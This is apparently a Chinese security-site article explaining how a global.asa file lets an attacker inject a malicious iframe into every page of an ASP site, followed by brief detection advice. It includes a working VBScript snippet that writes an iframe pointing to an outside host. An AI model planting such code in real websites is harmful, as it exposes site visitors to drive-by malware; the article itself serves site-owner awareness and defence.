热门关键字:   防毒墙

global.asa实现批量挂马 查找挂马的源头

发布时间:2018-10-31 13:18文章来源:未知文章作者: 点击次数:
摘要:Global.asa 文件是一个可选的文件,它可包含可被 ASP 应用程序中每个页面访问的对象、变量以及方法的声明。

一、本文毫无技术含量,高手绕道。
二、本文并非教授挂马知识,目的在于为广大站长提供一些防护思路。

一、什么是global.asa?
Global.asa 文件是一个可选的文件,它可包含可被 ASP 应用程序中每个页面访问的对象、变量以及方法的声明。

Global.asa 文件可包含下列内容:
Application 事件
Session 事件
<object> 声明
TypeLibrary 声明
#include 命令
注释:Global.asa 文件须存放于 ASP 应用程序的根目录中,且每个应用程序只能有一个 Global.asa 文件。

通过以上信息,我们能够知道,任何一个ASP程序在执行时,都会调用global.asa,这就给我们留下了一些隐患。

 

二、怎样实现
只要我们在网站下面建立一个global.asa,并且写入如下内容:

<SCRIPT LANGUAGE="VBScript" RUNAT="Server">
Sub Application_OnStart
End Sub
Response.Write "<iframe src=http://www.spookzang.net width=220 height=220></iframe>"
</script>

这样用户在第一次打开网页的时候就会触发挂马。

 

三、怎样预防
注意自己网站下面的global.asa文件,是否被改写或者添加。

因为其不像iframe,JS等挂马方法,能通过查看源码得到信息。
他只需在网站根目录下建立一个global.asa,然后在里面写入挂马内容即可让整个网站被挂马,而不需要在整个网站的网页内加入挂马内容。

上一篇:如何使用MySQL提升权限
下一篇:破解Session cookie的方法

热点推荐